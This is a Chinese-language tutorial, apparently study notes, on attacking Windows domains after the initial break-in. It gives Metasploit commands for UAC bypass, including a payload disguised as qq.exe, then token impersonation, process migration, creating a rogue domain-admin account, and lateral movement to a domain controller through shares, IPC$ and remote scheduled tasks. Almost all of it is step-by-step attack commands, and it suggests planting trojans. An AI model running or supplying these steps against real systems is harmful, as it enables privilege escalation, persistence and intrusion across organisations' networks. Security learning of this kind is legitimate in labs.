域安全（2）横向移动和纵向移动以及域的提权（后渗透）

域安全-UAC提权

需要UAC提权进行的操作：（基本在控制面板）

1.系统的更新

2.增加/修改账户

3.修改UAC设置等

借助msf

1.已经通过木马使目标计算机被控制 成功上线

2.进行UAC提权尝试（失败率比较高）

use exploit/windows/local/bypassuac (多用来进攻32位系统)

show options

set SESSION 1   //具体是几号机器就填相应的数字

exploit 开始攻击/run也可以执行

//如果攻击成功，会给你一个新的session号

进入新的session号

getuid

getsystem

ask模块进行uac提权

background 先把木马放到后台

use exploit/windows/local/ask 加载ask模块

info 查看漏洞信息

set SESSION 1    //使用漏洞在1号木马控制的目标上

set FILENAME   qq.exe   //伪装成文件名为qq

set LHOST [本地的ip地址]    //设置本地监听地址

exploit

会在用户桌面上弹出一个允许qq启动，用户选择yes，成功

getuid     //发现还不是system

getsystem  //可以提高到最高

域安全-令牌窃取 纵向移动 横向移动

令牌-token  更类似于web安全中的cookie

伪造令牌 可以实现提权 也就是纵向移动提权方法的一种

核心：kerberos协议

借助工具msf

步骤：

1.木马成功使目标计算机上线

2.进入一个session 

use incognito

list_tokens -u

impersonate_token TEST1\\Administrator(这个地方是上面出现的令牌中想要盗用的令牌的名字 反斜杠写两个)

//Successfully

shell  //即可获得冒用的相应的执行权限

whoami

纵向移动（这里介绍一种进程迁移注入的提权方法）

(移动到哪个进程 就可以以哪个进程的名义 做该进程持有者相应权限的事情)

1.首先不论任何手段获得system权限

此时权限是AUTHORITY\SYSTEM 我们需要横向移动到域管理员的权限上

2. 进程迁移提权

migrate [相应进程的pid]   //当前进程迁移到其他进程后 权限可能会根据进程权限而改变 可以找高权限的类似 TEST1\Administrator 域管理员的权限

get uid  //此时已经是域控管理员权限就够了 不能getsystem 否则会失去管理员的权限

3.令牌伪造提权： （这一步下才可以执行add_user命令） （也就是上面的伪造令牌 这里重复介绍一下）

use incognito
list_tokens -u
impersonate_token TEST1\\Administrator

3.后续操作 （纵向移动提权成功以后的横向移动以及后渗透）

#add_user [新用户账号] [新用户密码] -h [域控服务器ip地址]
add_user lyj Test123 -h 192.168.109.136
add_group_user "domain admins" lyj -h 192.168.109.136
shell
net group "domain admins"   //只能在域控制器上使用的命令

横向移动（纵向移动提权成功以后的情况下的横向移动）

1.使用纵向移动的方法 不论使用了哪种提权方法

这里默认已经获得了TEST1\Administrator 域控管理员权限 并且成功建立了另一个管理员权限的账户lyj

2.默认情况下域控windows会开放c盘的共享

方法1： 进入网络驱动器的映射

3.点击完成 登录刚才建立的新的管理员账户

方法2：命令行操作

net use \\192.168.109.136\c$ "Test123" /user:lyj
net share
net use
dir \\192.168.109.136\c$
type \\192.168.109.136\c$\a.txt

方法2-2：

当对方 开启了135 445端口时可以使用ipc$  或者管理员什么都没有修改那么可以使用ipc$  可以使用的权限更高

net use \\192.168.109.136\ipc$ "Test123" /user:lyj
net use

方法2-3：

远程访问（以远程访问进程为例）

tasklist /S 192.168.109.136 /U lyj /P Test123

方法2-4：

在内网被控制的机器的C盘创建一个文本文件a.txt

然后cmd执行命令 

可以把本机的文件拷贝到域控电脑C盘上的 这里也可以考虑传木马等 都很轻松了

copy a.txt \\192.168.109.136\c$

方法2-5：计划任务 9点51执行cmd命令并且输出到c盘下的1.txt内

at \\192.168.109.136 9:51PM cmd.exe /c "ipconfig > c:/1.txt" 

方法2-6：针对比较新的系统

schtasks /create /s 192.168.109.136 /tn test1 /sc onstart /tr c:/a.bat /ru system /f